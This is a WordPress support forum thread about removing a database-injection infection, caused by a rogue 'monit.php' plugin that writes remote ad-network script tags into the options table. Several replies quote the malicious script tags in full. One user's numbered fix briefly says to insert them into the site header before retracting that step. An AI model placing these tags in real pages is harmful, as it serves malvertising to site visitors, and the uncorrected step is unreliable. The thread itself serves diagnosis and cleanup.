DB Injection appears again and again…

I think that there must be something left on your server that is being overlooked, some malicious script hiding somewhere that has not yet been found. It might be that this malicious script is not even hiding on the site that keeps getting infected, it could be coming in from another site on the same server.

Your biggest clue is that admin_ips.txt file, what directory is that file in? The script that is writing that file might be in that same directory. Also, when that file is created, but before you make any changes to it, there will be some timestamps on the file that you can read with the “stat” command. Then you can cross-reference the modified timestamp with the entries in access_log files on your server. This may give you a clue as to what script is writing to that file.

You should also check the functions.php file in your theme and look for any new plugin files. These might contain new code that uses the “wp_footer” or some other WordPress hook to load a malicious function that will write all those malicious script tags to your DB.

Please send me anything you find that might help me identify this new threat and I will add it to my definition updates so that it can be automatically and completely removed in future scans.

eli AT gotmls DOT net

Hello, I have the same problem.
Wordfence and Anti-Malware from GOTMLS.NET not detect the malware. Only Sucuri detect the malware (<script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=”false”></script>)

I don’t know how fix it

• This reply was modified 4 years, 6 months ago by fabso.

Hi, i have the same problem….

It keeps showing up in the database … has anyone managed to fix it?

You tried to block write permissions from hosting.

Then I will tell you if this works.

Please if someone finds the solution, tell us how to do it.

Hello i am also facing the same problem

one of my website this script is showing in db wp option i am deleting but again is showing if anyone find the right solutions please pls tell us.

Hi everyone,
Please read and follow the suggestions in my first reply before flooding this thread with “same”, “same”, “same”…

If you want to find the source of this infection then follow these steps and report back to me with the results.

I will be the one to add this to the definition updates and post the solution once someone sends me the source code for this new threat. I have had multiple reports of similar infections but nobody has bothered to follow the trail back to script that is generating these injections.

Here are three things you can do to trace these infections back to the source of the malicious code:

1. When you see the admin_ips.txt file, but before you make any changes to it (or delete it), stat the file to get the modified time. Then you can cross-reference the modified timestamp with the entries in the access_log files on your server. This may point you to the script that is responsible for writing that file.

2. Use grep, or some equivalent text search command on your server, to locate any file that contains the text “admin_ips.txt”. if you are a coder and familiar with WordPress then you could also look for any “wp_footer” hook references and week out all the legitimate functions to find the misused function that has added this hook to inject this malicious code.

3. You could try the core files definitions as there is some indication that this code might have been injected into WP Core Files.
Please contact me directly if you would like more personalized support in tracking down the source of this infection:
eli AT gotmls DOT net

SOLUTION
Look in the plugins installation folder in wordpress for the file monit.php or type the name of your domain + /wp-admin/options-general.php?page=monit and see if a monitoring screen appears.
The monit.php plugin he creates admin_ips is for detecting the admim ip and nothing appears in the admin browser.
Delete the admin_ips and monit.php this solved my problem.

He who generates this command.
<script type = “text / javascript” src = “// ofgogoatan.com/apu.php?zoneid=3260072” async data-cfasync = “false”> </script>
<script src = “https://pushsar.com/pfe/current/tag.min.js?z=3260077&#8221; data-cfasync = “false” async> </script>

• This reply was modified 4 years, 6 months ago by cassio22avelar.

Thanks for posting that solution. That will work when the file is called monit.php but hacker often change the names of the files they use or copy the same malicious code into other files to avoid detection. Is there any chance that you could send me the contents of that monit.php file so that I can add this threat to my definition update? then it can be automatically removed no matter what file it’s injected into ??

eli AT gotmls DOT net

Hi everyone,
Big thanks to Floris for sending me the contents of this monit.php file. I have added this new threat to my definition update so it can now be automatically removed using my plugin. Please download the latest definition updates and run the complete scan to remove this threat ??

Hi Eli, I ran the scan and it detected this threat! I quarantined it but Securi is still detecting it. Does it take time for Securi to update to not show the virus anymore? Or is there something wrong still?

Great, thanks for confirming that the new update works.

Yes, Sucuri caches their scan results so you need to “Force a Re-scan” to see the updated scan results.

send me a link to the results if there is anything else I should look at.

Hello All,

The virus you are talking about on this thread found on monit.php file. If you are using any cache plugin, just clear the cache after removing file but still it shows in securi because the scripts are also injected into database of options table.

<script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3280383″ async data-cfasync=”false”></script>
<script src=”https://propu.sh/pfe/current/tag.min.js?z=3280389&#8243; data-cfasync=”false” async></script>

these two javascript are shown

@sahilkumargaba,
Thanks you for posting this. While this additional info might be helpful to some, I feel it’s important to note that this topic has been marked resolved because my plugin can fully remove these DB injection you listed here, as well as the PHP code that was responsible for injecting these scripts into your database.

Also, Sucuri has their own cache of their scan results so you still need to “Force a Re-scan” on the Sucuri page to see their updated scan results.

I found embedding a monit plug-in script from installing the plug-in downloaded from a free download website.

When installing the plug-in or the theme mentioned There will be a monit embedded in your website.

The script checks and stores the IP address of the admin by choosing not to show advertisements to administrators. And those entering the website directly via the URL

The script will only show ads to people searching for websites via search engines.

The checking and fixing methods I found.

1. Do not install plugins from 3rd party
2. Check the URL by going to
http: // ____ your URL ____ / wp-admin / options-general.php? page = monit
If your website has scripts it will display this page.

3. Go to the folder wp-content / plugins, admin_ips.txt and monit.php will be found.
4. Delete messages within the file without deleting the file to prevent rewriting And set the permission is read only
5. Insert this script in the header of the website to close the monit script.

<script type = “text / javascript” src = “// ofgogoatan.com/apu.php?zoneid=3280383” async data-cfasync = “false”> </script>
<script src = “https://propu.sh/pfe/current/tag.min.js?z=3280389&#8221; data-cfasync = “false” async> </script>

Examples of files that I found to include scripts

Sorry, I misunderstood the above comment. Please remove the script in section 5 from the header.

Greetings, I am afraid I have to re-open this again.
So, I have the same monit malware issue. I’ve deleted the theme and all related plugin + downloaded latest definition updates.
However, it seams the script is re-injection it self, even after Anti-Malware deletes it.
It seems to be bigger than what we think it is.

Screenshot:
https://ibb.co/wY0Sd57